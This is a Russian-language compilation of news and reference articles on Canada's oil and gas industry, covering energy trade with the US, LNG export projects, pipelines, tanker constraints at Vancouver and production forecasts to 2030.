Нефть канады: нефтяные объёмы, экспорт, газодобыча

Канада является крупнейшим партнером Соединенных Штатов по энергетической торговле. По данным U.S. Census Bureau, 5% от общего объема экспорта из США в Канаду составляет энергия.

В то же время, доля энергии от общего объема импорта из Канады в США в 2016 году составила 19%. Объемы энергетической торговли между США и Канадой в течение последнего десятилетия существенно изменялись. Это было вызвано, в основном, изменениями цен на нефть и газ.

Однако, общая структура энергетической торговли между двумя странами осталась, в целом, без изменений.

Объем энергетического импорта в США из Канады существенно превышает экспорт из США в Канаду.

Рис. 1 Объем энергетической торговли между Канадой и США в период с 2006 по 2016 годы (млрд. долларов)

В 2015 и 2016 годах объем энергетического импорта в Канаде и объем энергетического экспорта в США сократились, что стало отражением снижения цен на ключевые полезные ископаемые, в том числе, нефть, нефтепродукты и природный газ. В 2016 году энергетической импорт в США из Канады оценивался в $53 млрд., а экспорт из США в Канаду — в $14 млрд.

Рис. 2 Месячный объем энергетической торговли между США и Канадой в период с января 2014 года по декабрь 2016 года

Основную часть импорта из Канады в США составляет нефть — около 3.3. млн. баррелей в день. По результатам 2016 года, Канада стала крупнейшим импортером нефти в США — 41% от общего показателя импорта энергии.

В 2014 году стоимость поставленной в США из Канады нефти составила более $83 млрд. В 2015 и 2016 годах цена на нефть обрушилась, и стоимость импорта нефти из Канады упала с $47 млрд. в 2015 году до $36 млрд.

в 2016 году, даже несмотря на то, что объемы импорта увеличились.

Экспортная нефть, поставляемая из Канадской провинции Alberta в регионы Midwest и Gulf Coast в США, состоит, в основном, из тяжелых сортов.

До 2013 года практически весь экспорт нефти из США был направлен в Канаду. После того, как США начали экспортировать больше нефти в другие страны, Канаде стала доставаться всё меньшая доля американской нефти.

В 2016 году средний показатель экспорта американской нефти в Канаду составил 301,000 баррелей в день, а в другие страны – 219,000 баррелей в день. Из США в Канаду доставляются, в основном, легкие и сладкие сорта нефти.

Поставки осуществляются, в основном на восток страны.

Совместная торговля нефтепродуктами между США и Канадой довольно сбалансирована как с точки зрения объемов, так и с точки зрения стоимости поставок.

В 2016 году в Канаду поставлялось 564,000 баррелей нефтепродуктов в день, что составляет 12% от общего объема экспорта нефтепродуктов в США. Общая стоимость поставок составила более $8.2 млрд.

Однако, объем поставок существенно зависит от конкретного вида нефтепродукта и от региона.

США являются чистым импортером канадского бензина, существенная часть которого направляется из нефтеперерабатывающих заводов на востоке Канады на северо-восток Соединенных Штатов.

Интересно отметить, что очень небольшое количество нефтепродуктов, экспортируемых из США в Канаду, являются транспортным топливом. Основную часть экспорта из США в Канаду составляют пентаны, сжиженные нефтяные газы и т.п.

Часть этих продуктов используется в качестве растворителя, обеспечивающего транспортировку тяжелых сортов нефти, производимых в Канаде, по трубопроводам.

В свою очередь, США являются крупным экспортером нефтепродуктов в Канаду, и за последнее десятилетие объемы поставок американских нефтепродуктов постоянно увеличивались.

Поставки природного газа между Канадой и США осуществляются преимущественно посредством трубопроводов. В 2016 году средний показатель импорта природного газа из Канады составил 8.0 млрд. кубических футов в день (Bcf/d) – это 97% от всего импорта американского природного газа.

Общий объем импорта природного газа из Канады в 2016 оценивался в размере $5.9 млрд.

Большая часть экспортируемого в США канадского природного газа добывается в западной части страны и доставляется в западный, северо-восточный и средне-западный регионы Штатов.

Увеличение объемов добычи природного газа на месторождениях Marcellus и Utica сделало США менее зависимыми от импорта газа из западной части Канады.

Газ, который экспортируется из США в Канаду (в 2015 году средний показатель экспорта составил 1.9 Bcf/d, а в 2016 — 2.1 Bcf/d), по большей части отправляется из Michigan и New York в восточные провинции Канады.

Увеличение проходимости трубопроводов, предназначенных для транспортировки природного газа с месторождений Marcellus и Utica, в ближайшие годы может повлечь рост объема поставляемого из Штатов в Канаду природного газа.

Рис. 3 Торговля электроэнергией между США и Канадой в период с 2000 по 2016 годы

Электроэнергия является небольшим, но важным элементом энергетической торговли между США и Канадой. В 2015 и в 2016 годах стоимость импорта электроэнергии из Канады в США составляла, в среднем, $2.2 млрд.

В период с 2006 по 2014 годы данная цифра составила $2.4 млрд. В 2016 году США импортировали 73 млн. мегаватт-часов в Канаду, а экспортировали — 9.3 млн.

мегаватт-часов — указывает канадская National Energy Board.

Объемы торговли электроэнергией между США и Канадой увеличиваются. Хотя поставляемая электроэнергия является малой частью энергозапаса Штатов, линии электропередач, соединяющие Канаду и США являются важным компонентом для рынков электроэнергии обеих стран. Кроме того, они способствуют повышению надежности системы электропередачи.

Источник: http://oilstat.ru/analytics/138289

Газовый профиль Канады

Канада — пятый по величине производитель газа в мире и четвертый крупнейший экспортер газа после России, Катара и Норвегии. Львиная доля канадского экспорта направляется в США по трубопроводам.

В прежние годы Канада была важным источником поставок газа в США, но объемы экспорта значительно снизились с 2009 года, когда внутренняя добыча США выросла благодаря разработке сланцевых месторождений. Сегодня Канада сосредоточена на развитии новых рынков для экспорта СПГ — в особенности важного азиатского рынка, который Канаде удобно обслуживать со своего западного побережья.

В провинции Британская Колумбия запланировано более 20 проектов, большинство из которых сконцентрированы в районе Китимат и рядом с портовым городом Принц-Руперт.

Кроме того, запланировано строительство пяти заводов по сжижению газа на восточном побережье страны, в провинциях Новая Шотландия и Нью-Брансуик. Один из проектов предполагает перепрофилирование СПГ-терминала Canaport на экспорт. По аналогии со схожими проектами в США, предлагается сравнительно быстрый и дешевый способ запустить экспорт СПГ.

Аппетиты азиатских и европейских покупателей станут важным фактором, определяющим то, какая часть из этих проектов получит поддержку, необходимую для принятия окончательного решения об инвестициях. По состоянию на январь 2016 года окончательного решения об инвестициях не было принято ни по одному из канадских экспортных проектов.

Запуск дополнительных СПГ-мощностей в Австралии, старт проектов на побережье Мексиканского залива США и огромное падение цен на нефть с 2014 года означают, что многие канадские проекты будут либо отложены, либо отменены.

Производство сухого газа снижалось в Канаде в период с 2002 по 2013 год, но выросло примерно на 5,6 млрд кубометров в 2014 году.

Многие из традиционных канадских месторождений, включая крупнейшие залежи в Западно-Канадском осадочном бассейне, достигли зрелости, и уровень добычи на них падает.

Однако, Канаде принадлежат огромные нетрадиционные запасы метана угольных пластов, сланцевого газа и газа из слабопроницаемых пород, которые помогут позволить ей повторить успех, достигнутый в США при помоще горизонтального бурения и гидравлического разрыва пласта (фракинга).

У Канады есть пять крупных залежей нетрадиционных запасов топлива. Месторождения Хорн-Ривер, лиман Кордова и Лиардский бассейн расположены в северной части провинции Британская Колумбия.

Месторождения Глубокого бассейна расположены в провинциях Альберта и Британская Колумбия, а месторождения Группы Колорадо — в центральных и южных регионах Альберты.

В эксплуатацию этих резервов уже инвестировали многие канадские и зарубежные компании.

Добыча на этих месторождениях должна поддержать предполагаемые проекты по экспорту СПГ с побережья Британской Колумбии (и, как минимум, два проекта на атлантическом побережье Канады). Все экспортные проекты подали заявки на одобрение в Национальное энергетическое управление, регулирующее эту область, и по состоянию на январь 2016 года 22 из них получили одобрение.

Статистика

В 2014 году США импортировали из Канады 74 млрд кубометров газа, что значительно меньше, чем пиковые значения в 108 млрд кубометров, зарегистрированные в 2002 и 2007 гг. В том же году США экспортировали в Канаду почти 21,8 млрд кубометров газа, что значительно выше, чем десятилетием раньше.

По оценкам Управления энергетической информации (УЭИ), доказанные газовые резервы Канады по состоянию на конец 2014 года составляли 1,9 трлн кубометров. Согласно обновленной оценке, подготовленной УЭИ в ноябре 2015 года, Канада обладает неподтвержденными, но технически добываемыми запасами сланцевого газа в объеме 16,2 трлн кубометров.

СПГ-терминал Canaport

Дата запуска 2009
Местоположение Сент-Джон, Нью-Брансуик
Мощность по переработке 7,5 млн тонн/год
Мощности по поставке в трубопровод 1,2 млрд кубофутов/сутки (34 млн кубометров/сутки)
Разгрузочные пристани 1
Вместимость причала 260 млн кубометров
Вместимость резервуаров 10 млрд кубофутов/283 кубометров (три цистерны)
Оператор Canaport LNG
Владельцы Repsol, 75%; и Irving Oil, 25%
Ссылка на сайт www.canaportlng.com

Canaport — единственный СПГ-терминал Канады. Он был запущен в 2009 году и обеспечивает поставки газа в северо-восточные провинции страны. В зимние месяцы терминал также поставляет газ в шесть американских штатов.

Терминал получает контрактованные поставки из Тринидада и Тобаго, и спотовые поставки из Испании и Канады. Канадский спрос на СПГ достиг своего пика в 2011 году, и начал падать после роста добычи сланцевого газа в США.

В 2014 году Тринидад был единственным источником канадского импорта СПГ, поставив в страну 555 млн кубометров газа в виде СПГ.

Терминал наиболее активно работает в холодные месяцы, когда спрос на газ достигает своего пика.

В период между январем и ноябрем 2014 года Canaport получал в среднем 1,42 млн кубометров газа в день, но в зимние месяцы 2014-2015 гг поставки вырастали до отметки в 19,8 млн кубометров в день.

Компания Repsol планирует построить рядом с терминалом Canaport в Сент-Джоне установку по сжижению газа с мощностью в 5 млн тонн в год. В 2015 году Национальное энергетическое управление Канады выдало проекту лицензию на экспорт до 8 млрд кубометров СПГ в год на срок в 25 лет. Управление также выдало проекту разрешение импортировать такой же объем газа для сжижения из Соединенных Штатов.

Запланированные заводы по сжижению газа

Компании планируют монетизировать обширные канадские запасы газа, экспортируя топливо в виде СПГ в Азию и Европу. Проекты по сжижению газа в Канаде имеют значительные преимущества, учитывая небольшое расстояние до рынков сбыта и высокую эффективность эксплуатации, связанную с холодным климатом страны.

Канадские проекты разделены между заводами на западном побережье, нацеленными на азиатский рынок, и установками на восточном побережье, сосредоточенными на Европе.

Привлеченные недавним ростом цен на газ в Азии, большинство компаний собирается строить заводы по сжижению газа на западном побережье.

Однако в западной Канаде не хватает необходимой инфраструктуры, вроде дорог и портов для доставки материалов, и нет достаточного количества населенных пунктов для поддержки эти проектов.

Австралийский опыт развития газовых проектов с нуля показал их  запретительную дороговизну, усиленную высокими расходами на оплату труда. Многие из подобных проектов также требуют создания новой трубопроводной инфраструктуры.

Проекты на восточном побережье Канады запланированы в менее труднодоступных местах, однако, по-прежнему требуют расширения трубопроводной инфраструктуры. Огромные расходы, связанные со строительством заводов по сжижению газа с нуля, и недавные подвижки в ценах на нефть и газ заставили многих из потенциальных владельцев проектов пересмотреть свои планы.

СПГ-проекты западного побережья

Проект Местоположение Мощность (млн т/г) Ведущая компания проекта
Aurora LNG Принц-Руперт, Британская Колумбия (БК) 21 Nexen Energy (CNOOC)
Cedar LNG Китимат, БК 14.5 Golar
Discovery LNG Кэмбелл Ривер, БК 20 Quicksilver Resources
Douglas Channel LNG Китимат, БК в процессе обсуждения СП Altagas и Idemitsu
Grassy Point Принц-Руперт, БК 20 Woodside
Kitimat LNG Китимат, БК 10 Chevron
Kitsault Energy Project Китсаулт, БК 20 Kitsault Energy
LNG Canada Китимат, БК 24 Shell
Malahat LNG о-в Ванкувер, БК 24 Steelhead LNG
NewTimes Energy Принц-Руперт, БК 12 NewTimes Energy
Nisga’a LNG Залив Насога, БК TBD Nisga’a Nation
Orca LNG Принц-Руперт, БК 24 Orca LNG
Pacific Northwest LNG Принц-Руперт, БК 21 Petronas
Prince Rupert LNG Принц-Руперт, БК 21 BG Group
Sarita LNG о-в Ванкувер, БК 6 Steelhead LNG
Stewart Energy Project Стюарт, БК 30 Stewart Energy Group
Triton LNG Китимат, БК 2.3 СП Altagas и Idemitsu
Watson Island LNG Принц-Руперт, БК в процессе обсуждения Watson Island LNG Corp.
Wespac Tilbury LNG Дельта, БК 3 Wespac Midstream
West Coast Canada LNG Принц-Руперт, БК 30 Imperial Oil & ExxonMobil
Woodfibre Сквамиш, БК 2.1 Pacific Oil & Gas (RGE)

Произошедшее на мировых рынках падение цен на нефть и газ вкупе с падающим спросом на СПГ со стороны азиатских стран заставили разработчиков пересмотреть свои взгляды на жизнеспособность мега-проектов в Британской Колумбии. Тем не менее, ряд более мелких проектов, не требующих столь огромных вложений, продолжает демонстрировать некоторую активность.

СПГ-проект Tilbury предполагает добавление разгрузочного причала к уже существующему заводу по сжижению газа. Хотя проект еще не получил разрешения Национального энергетического управления Канады на экспорт СПГ на международные рынки, сравнительная легкость задачи по строительству разгрузочного причала означает, что у проекта есть все шансы первым начать работу.

Проект Douglas Channel при поддержке совместного предприятия AltaGas и Idemitsu также продолжает свое развитие.

Проект предполагает пришвартовку баржи, на которой будет происходить сжижение газа, в Канале Дуглас, неподалеку от Китимата, а использовать он будет газ, поставляемый по Тихоокеанскому северному газопроводу.

Предполагается, что строительство баржи будет оплачено компанией Exmar, которая является партнером этого проекта. Если этот проект окажется успешным, он будет расширен за счет проекта Triton, который также принадлежит СП AltaGas и Idemitsu.

Помимо вышеперечисленных проектов, единственным другим СПГ-проектом в Британской Колумбии с шансами на развитие является проект Woodfibre. Его владельцы собираются перепрофилировать ранее использовавшуюся территорию и использовать плавучие склады и разгружающиеся судна для снижения затрат.

СПГ-проекты восточного побережья

Проект Местоположение Мощность (млн т/г) Ведущая компания проекта
Bear Head LNG о-в Кейп-Бретон, Новая Шотландия 4 LNG Ltd
Canaport LNG Сент-Джон, Нью-Брансуик Repsol
Goldboro LNG Голдборо, Новая Шотландия 10 Pieridae Energy
H-Energy Мелфорд, Новая Шотландия 13.5 Hiranandani Group

Проекты на восточном побережье Канады нацелены на европейский и индийский рынки.

С момента мирового финансового кризиса 2008 года европейский рынок находится в подавленном состоянии и практически не демонстрирует признаков восстановления.

Тем не менее, желание сократить зависимость от российского газа по следам событий на Украине заставило некоторые из европейских компаний начать поиски альтернативных источников поставок.

Из вышеперечисленных проектов наиболее вероятно развитие проекта Canaport, который предполагает перепрофилирование существующего импортного СПГ-терминала под экспорт. Это поможет снизить издержки и напоминает по замыслу проекты на американском побережье Мексиканского залива.

Источник: http://neftianka.ru/gazovyj-profil-kanady/

Нефтяная промышленность Канады

Канада представляет собой одну из крупнейших нефтяных держав мира, после Саудовской Аравии, России, США, Ирана, Китая, Мексики. Экспортная сеть Канады равна 3,289 млн. баррелей в день.

Главный импортер нефти Канады – Соединенные штаты Америки. Доказанные запасы нефти в Канаде оцениваются в 178,9 млрд. баррелей, что составляет 13,21% от мировых запасов, и являются вторыми по величине в мире.

Самые большие запасы этого полезного ископаемого находятся на территории Саудовской Аравии.

Все запасы нефти в Канаде делятся на семь регионов, также называемые «углеводородные регионы» (Рисунок 1).

Рисунок 1. Нефтеносные регионы Канады. Автор24 — интернет-биржа студенческих работ

Добыча нефти в Канаде происходит на трех основных источниках:

  • нефтеносные пески;
  • запасы Западно-канадского осадочного бассейна (WCSB);
  • шельфовые нефтяные месторождения в Атлантическом океане.

Основная часть запасов канадской нефти сосредоточена в провинции Альберта (около 97%), которая относится к территории Западно-Канадского осадочного бассейна. В настоящее время уже добыто около 40% запасов «традиционной» нефти. Несмотря на огромные запасы нефти в Канаде, большая часть из них находится в нефтеносных песках.

Ничего непонятно?

Попробуй обратиться за помощью к преподавателям

Определение 1

Нефтеносные пески представляют собой альтернативный источник нефти, состоящий из битума, песка, воды и глины.

Битумы – это полутвердая субстанция, поэтому традиционные способы выкачивания к ним не применимы. Из этого возникает множество проблем в нефтяной индустрии Канады. Однако, в связи с увеличением цен на нефть, разработка нефтеносных песков ведется все более активнее.

Более 700 компаний задействованы в разработке и добыче нефти на территории Канады.

В Канаде 16 нефтеперерабатывающих заводов (НПЗ) общая мощность которых составляет 1,9 млн барр/сут. Мощность восьми НПЗ Западной Канады равна 679 тыс. барр/сут., в то время как шесть НПЗ Восточной Канады имеют возможность перерабатывать 1,2 млн барр/сут.

Нефтяной экспорт Канады

Объемы добываемого сырья и его потребление внутри страны постоянно растут, несмотря на имеющиеся трудности. Активно внедряются и развиваются новые технологии, которые повышают рентабельность производства.

Основная часть добытой нефти экспортируется в Соединенные Штаты Америки, что составляет 97% от всего экспорта сырой нефти и жидких нефтепродуктов Канады. Самым дешевым способом транспортировки больших объемов нефти на дальние расстояния остается нефтепровод. Именно по нефтепроводам транспортируется более 90% добытой нефти.

Экспорт нефти в США происходит по трем основным нефтепроводам: Enbridge Pipelines Inc., Transmountain pipeline Inc., Express Pipeline Ltd.

Крупнейшим из них является Enbridge Pipelines Inc., который берет свое начало в Эдмонтоне (Альберта) и пересекает канадско-американскую границу вблизи Гретны (Манитоба). Эта трубопроводная система передает 2/3 всей экспортируемой нефти.

Два других нефтепровода передают в сумме 1/3 поставляемой нефти соответственно. Transmountain pipeline Inc.

начинается в Эдмонтоне, проходит через Британскую Колумбию к тихоокеанскому побережью США, таким образом пересекая границу в приморской зоне. Начинается Express Pipeline Ltd.

в Хардисти (Альберта) и идет на юг, при этом пересекая границу в континентальной зоне. Третий нефтепровод представляет собой самый короткий путь на американский рынок.

Ежегодно нефтепроводная сеть Канады транспортирует выше 3 млн. баррелей сырой нефти.

Замечание 1

На сегодняшний день уже ощущается нехватка пропускной способность сети, поскольку она загружена на 99% и не имеет резерва. Поэтому увеличиваются объемы транспортируемой нефти по железным дорогам.

Страны Азии проявляют интерес к битумной нефти Канады, именно поэтому экспорт к новым рынкам возможен только через приморскую зону. Канадские власти рассматривают терминалы и порты в качестве выходов к морю.

Создаются проекты по строительству новых трубопроводов к морским портам, также рассматриваются варианты использования железных дорог.

Таким образом, в перспективе вырастет значение приморской зоны для экспорта на внешние рынки.

Современные тенденции развития нефтяной отрасли Канады

По прогнозам аналитиков, нефтяная отрасль Канады по темпам подъема в последующие несколько лет будет уступать только США. Добыча нефти будет расти вплоть до 2030 года. Начало разработки новых месторождений до кризиса 2014 года дает возможность только наращивать производства.

Предполагается, что совокупная добыча нефти в стране до 2030 года вырастет на 39%, т.е. до 5,1 млн. баррелей в сутки.

Эксперты Канадской Ассоциации нефтедобывающих компаний (CAPP) отмечают, что благодаря выполнению проектов, запустившихся до кризиса, добыча нефти в Канаде будет расти, несмотря на то, что инвестиции в нефтяную отрасль имеют тенденцию к снижению. А благодаря сверхтяжелой нефти, Канада станет одним из влиятельных игроков на мировом рынке углеводородов.

Еще одним фактором развития нефтяной промышленности в Канаде будет являться привлечение иностранных инвестиций.

Особый интерес проявляют инвесторы из Азии, а также китайские компании государственного сектора, поскольку нестабильность поставок из стран Ближнего Востока и Северной Африки побуждают к поиску поставщика с большими запасами нефти, а также стабильной экономической и политической обстановкой.

Таким образом, в ближайшие несколько лет Правительство Канады для успешного развития нефтяной промышленности будет проводить следующие действия:

  • Мониторинг деятельности предприятий, которые занимаются разработкой нефтеносных песков. Разработка современных и более эффективных методов добычи нефти позволит снизить воздействие на экосистему страны
  • Разработку и реализацию проектов по развитию средств транспортировки нефти
  • Особое внимание будет уделяться разработке стратегии по выводу канадской нефти на мировой рынок, а именно, в страны Азии
  • Привлечение частных инвестиций для обеспечения финансирования долгосрочных проектов, которые связаны с разработкой нефтеносных песков.

Источник: https://spravochnick.ru/ekonomika/vidy_i_formy_promyshlennosti/neftyanaya_promyshlennost_kanady/

Nord Steady, танкер для перевозки химикатов и нефти, встает на якорь перед швартовкой у НПЗ Chevron в Бернаби около Ванкувера, пров. Британская Колумбия, Канада, 17 ноября 2016 г. Фото от 17 ноября 2016 г. REUTERS/Chris Helgren

Компании Suncor Energy, Cenovus Energy и другие канадские топливодобывающие компании в расчете на повышение конъюнктуры призывают премьер-министра Канады Джастина Трюдо (Justin Trudeau) к декабрю одобрить масштабное расширение трубопроводов до западного побережья страны. Это позволит увеличить объемы продажи в Азию сырой нефти, которую добывают из внутриматериковых нефтеносных песков.

Но все больше брокеров по фрахтованию судов и физических нефтетрейдеров предупреждают, что вся новая нефть будет попадать в порт Ванкувера, а его возможности ограничены невозможностью принимать корабли-гиганты, которые лидируют в мировых нефтяных грузоперевозках.

Брокеры говорят, что это своеобразное «бутылочное горлышко» является одним из очень недооцененных препятствий, которые канадская нефть встречает на пути из самого загруженного порта Ванкувера.

Добывающие компании с Ближнего Востока уже отправляют нефть в Азию по гораздо меньшей цене благодаря использованию более крупных судов. А республиканцы, которые в ноябре победили на выборах в США, возродили надежду на то, что канадская TransCanada Corp построит трубопровод Keystone XL на территорию США, окончательно оставив Ванкувер в стороне.

15 ноября министр природных ресурсов Канады Джим Карр (Jim Carr) сообщил журналистам, что Keystone «не доставляет нефть на экспортные рынки Азии, а цель правительства Канады – расширить экспортные рынки».

Премьер-министру Трюдо предстоит принять решение о том, стоит ли увеличивать трубопровод Trans Mountain, принадлежащий Kinder Morgan, который пропускает 300 000 баррелей в сутки и по которому нефть попадает из Альберты в Ванкувер. Данный проект, против которого решительно выступают многие экологи и группы поддержки коренных народов, увеличит общую пропускную способность трубопровода до 890 000 баррелей в сутки.

Сейчас около 98% экспортной канадской нефти попадает в США, где ее продают по ценам ниже общемировых. И Ванкувер – единственный порт на западном побережье, из которого нефть можно экспортировать в Азию.

«Если Канада не будет продавать свою нефть на какой-либо другой рынок, кроме американского, она никогда не сможет устанавливать цены и останется ведомым участником рынка» – утверждает Сэнди Фиден (Sandy Fielden), руководитель направления исследований нефти и нефтепродуктов компании Morningstar.

По мнению представителей компании Cenovus, которая раньше экспортировала нефть в Азию, а сейчас занимается регулярными поставками по трубопроводу Trans Mountain, расширение трубопровода будет важным шагом, но не решит всей проблемы.

«Нам в любом случае понадобится дополнительная пропускная способность, чтобы добраться до канадских и американских глубоководных портов, в которые могут заходить крупные танкеры» – заявил представитель компании Ред Каррен (Reg Curren).

По информации, полученной от Канадской ассоциации нефтедобытчиков в начале этого года, в ближайшие годы объемы добычи из канадских запасов нефти будут превышать возможности инфраструктуры. Поэтому необходимы дополнительные трубопроводы, в том числе для поставки нефти на мировой рынок.

AFRAMAX ПРОТИВ SUEZMAX

Самый крупный нефтяной танкер, который может зайти в доки Ванкувера – это судно класса Aframax, вмещающее от 500 000 до 700 000 баррелей. Суда в порту могут быть загружены только на 80% из-за глубины и других ограничений, поэтому в данный танкер можно залить около 550 000 баррелей.

  • Это разительно отличается от танкеров Suezmax вместимостью 1 млн баррелей или от крупнотоннажных танкеров вместимостью 2 млн баррелей, которые занимаются перевозками в Ираке или Сингапуре.
  • Если порт может принимать только танкеры Aframax, то экспорт в Азию будет очень нерентабельным, уверен Мэтт Смит (Matt Smith), руководитель направления исследований товарных рынков компании ClipperData, которая занимается отслеживанием морских судов.
  • Ожидается, что порт Ванкувера, в котором расположен морской нефтяной терминал компании Kinder Morgan, увеличит количество принимаемых танкеров с сырой нефтью и химическими веществами со 100 до 400 судов в год, но принимать более крупные танкеры данный порт не планирует.
  • Также ожидается, что отправка танкеров Aframax увеличится с примерно пяти в месяц до одного в день, сообщил Али Хаунселл (Ali Hounsell), представитель проекта расширения трубопровода Trans Mountain.

Но фрахтовые брокеры полагают, что будет непросто обеспечить достаточное количество танкеров Aframax для порта Ванкувера. Многие суда этого класса уже задействованы на маршруте Россия-Азия, поэтому за то, чтобы направить их по другому маршруту, придется доплачивать.

Сегодня, по данным о морских перевозках от Thomson Reuters Eikon, большинство судов из Ванкувера отправляется на НПЗ в американские штаты Вашингтон, Калифорния или Гавайи.

«Канадские добывающие компании будут продавать нефть туда, где будет самая высокая цена. В краткосрочной перспективе это, видимо, будет западное побережье США», – утверждает Эрик Брукхейзен (Erik Broekhuizen), глава подразделения анализа танкерного флота и консалтинга в компании Poten & Partners, занимающейся фрахтованием судов.

В октябре судно с грузом примерно в 150 000 баррелей отправилось из Канады в Южную Корею. Ранее такое же судно примерно с 77 000 баррелями ушло в Китай в июне и с таким же объемом в мае. Трейдеры говорят, что такие редкие и немногочисленные отправки подтверждают, насколько сложно доставлять большие объемы нефти из Канады в Азию с точки зрения логистики.

И цена на канадскую нефть, предназначенную на экспорт в Азию, должна быть достаточно низкой, чтобы компенсировать затраты на перевозку через Тихий океан на небольших судах. Трейдеры также отмечают, что многие азиатские нефтепереработчики предпочитают иракскую нефть из-за более низкой кислотности.

«Индия и Китай могут покупать нефть, если цена на нее будет низкой, – утверждает аналитик из североазиатской нефтеперерабатывающей компании, который отказался назвать свое имя, так как не уполномочен делать заявления для СМИ. – Все действительно зависит от цены и стоимости перевозки».

  1. И все же, как утверждает аналитик из Wood Mackenzi Афолаби Огуннайке (Afolabi Ogunnaike), с учетом роста потребности азиатских нефтепереработчиков в сырой нефти, экспорт в Азию может стать лучшим решением для Канады.
  2. По его оценкам, как минимум 50% новых объемов, попадающих в Ванкувер (а это около 300 000 баррелей в сутки), будет отправляться в Азию.
  3. Многие сомневаются, что расширение окажет значительное влияние на товарооборот, но при этом никто не будет спорить с тем, что появление дополнительного направления в любом случае благотворно повлияет на рынок.

«Когда появляется новый торговый маршрут, всегда наступает неспокойный период, – говорит Сарп Озкан (Sarp Ozkan), старший энергоаналитик в консалтинговой компании Ponderosa Advisors. – Я не утверждаю, что будет легко. Но в итоге, если Канаде удастся найти рынок сбыта в Азии, она сможет составить оптимальный график движения танкеров Aframax или найти какой-то другой способ доставки нефти».

Оригинал: http://www.reuters.com/article/us-canada-ports-crude-analysis-idUSKBN13G016

Источник: https://neftynik.ru/us-canada-ports-crude-analysis-iduskbn/

Канада удвоила импорт нефти из США

В апреле Канада почти в 2 раза увеличила импорт нефти из США по сравнению с апрелем 2013 г.

  • В апреле Канада почти в 2 раза увеличила импорт нефти из США по сравнению с апрелем 2013 г.
  • Экспорт нефти из США ограничен законом десятилетия назад, но компании могут получать лицензии на продажу нефти Канаде.
  • Канада в апреле импортировала из США около 8,1 млн барр, или около 270 тыс барр в день, на 95% больше, чем в апреле 2013 г, когда импорт составил 4,2 млн барр.  
  • Импорт вырос на 4% по сравнению с мартом, когда Канада ввезла из США около 7,8 млн барр нефти.

В общей сложности Канада в апреле импортировала 17,5 млн барр, или примерно 583 тыс барр в день, из разных стран. Её крупнейшим поставщиком были США, на втором месте следует Ирак.  

  1. Импорт из Ирака составил 2,26 млн барр, или 75 тыс барр в день.
  2. Вся эта нефть пошла в провинцию Ньюфаундленд и Лабрадор, на НПЗ мощностью 115 тыс барр в день, оператором которого является компания North Atlantic Refining, дочерняя структура корейской Korea National Oil Corporation.  
  3. В апреле Канада впервые больше чем за год получила около 1 млн барр нефти из Азербайджана.
  4. Эта нефть была направлена на нефтеперерабатывающие заводы компаний Suncor Energy Inc и Valero Energy Corp в провинции Квебек.  

Канада обладает третьими крупнейшими в мире запасами нефти, уступая только Саудовской Аравии и Венесуэле, и добывает около 4,3 млн барр в день, но тем не менее импортирует нефть из-за ограниченного доступа к трубопроводам, которые транспортируют нефть из добывающих регионов в западной части страны на НПЗ в её восточной части. Нефтеперерабатывающие заводы используют железные дороги, танкеры, баржи и трубопроводы для транспортировки нефти с американских сланцевых месторождений Eagle Ford (Техас) и Баккен (Северная Дакота).  

«НПЗ восточного побережья Канады не конфигурированы для переработки дилбита, который поставляется из Альберты. Так что нет никаких причин для замедления роста импорта» — сказал нефтяной аналитик Ф.Верлегер.  

Даже если противники запрета на экспорт нефти из США сумеют добиться его отмены, это, по мнению Ф.Верлегера, не отразится на поставках в Канаду с Баккена, так как Северная Дакота имеет ограниченный доступ к нефтепроводам, связывающим месторождения с американскими портами.  

  • Данные Статистического управления Канады показывают, что крупнейшим экспортёром в страну американской нефти пятый месяц подряд был Техас, хотя объёмы поставок снизились до 4,4 млн барр, то есть оказались на 20% меньше, чем в марте, когда штат поставлял северному соседу США 5,5 млн барр.  
  • Поставки из Северной Дакоты выросли на 50% по сравнению с мартом и составили 3,1 млн барр.  
  • Среди канадских провинций крупнейшим импортёром американской нефти в апреле был Квебек.

В провинцию поставлено 4,3 млн барр. Нью-Брансуик, где находится НПЗ Irving Oil мощностью 300 тыс барр в день, импортировал 2,3 млн барр преимущественно из Техаса.

Источник: https://neftegaz.ru/news/finance/242663-kanada-udvoila-import-nefti-iz-ssha/

Канада становится нефтяной сверхдержавой

Добыча нефти в Канаде будет увеличиваться до 2030 года.

Рост производства обеспечивают месторождения, разработка которых началась до обвала нефтяного рынка в конце 2014 года и начала «ценовой войны» между американскими «сланцевыми компаниями» и ОПЕК.

Впервые в истории канадская тяжелая нефть начала использоваться не только для переработки, но и для пополнения американских коммерческих хранилищ. Благодаря росту добычи, Канада получила возможность влиять на мировой рынок нефти.

Нефтяное Эльдорадо

Согласно данным ВР Statistical Review of World Energy, по запасам нефти Канада занимает третье место в мире после Венесуэлы и Саудовской Аравии. На конец прошлого года доказанные запасы нефти составляли 171,5 млрд барр. (27,6 млрд т).

Однако Канада располагает в основном месторождениями сверхтяжелой нефти, которая представляет собой смесь природного битума с песком и глиной.

Добыча ведется открытым карьерным способом, если нефтяной пласт залегает близко к поверхности, либо через пробуренные скважины (in-situ), когда глубина залегания значительная.

Себестоимость добычи сверхтяжелой нефти очень высокая, даже карьерным способом, но при ценах свыше 100 долларов за баррель канадские и иностранные компании охотно инвестировали в разработку месторождений Канады. После обвала нефтяного рынка в конце 2014 года многие полагали, что добыча нефти в стране снизится, но этого не произошло.

Если в соседних США после достижения пика в апреле 2015 года добыча упала более чем на 1 млн барр./сут., то в Канаде она продолжала расти, поскольку ни один проект остановлен не был.

Центральное правительство и правительство провинции Альберта, где находятся крупнейшие в мире месторождения битуминозных песков Athabasca, Cold Lake и Peace River, оказали нефтяникам всестороннюю поддержку, чтобы они не сокращали объемы производства.

Как и в США, канадские нефтяные компании были вынуждены максимально снизить производственные издержки и переходить на современные технологии, которые позволяли максимально эффективно извлекать сверхтяжелую нефть. В настоящее время самой распространенной технологией является SAGD (парогравитационный дренаж), которая позволяет при благоприятных условиях извлекать из пласта до 70% сверхтяжелой нефти.

Радужные прогнозы

Канадская Ассоциация нефтедобывающих компаний (САРР) опубликовала прогноз развития отрасли в краткосрочной и среднесрочной перспективе. Ожидается, что совокупная добыча жидких углеводородов в стране с 2017 года по 2030 год вырастет на 39% — до 5,1 млн барр./сут.

При этом, добыча обычной нефти и конденсата должна будет поддерживаться на текущем уровне – около 1,5 млн барр./сут., а рост производства обеспечит сверхтяжелая нефть, добыча которой к 2030 году достигнет 3,7 млн барр./сут. – на 53% больше по сравнению с прошлым годом.

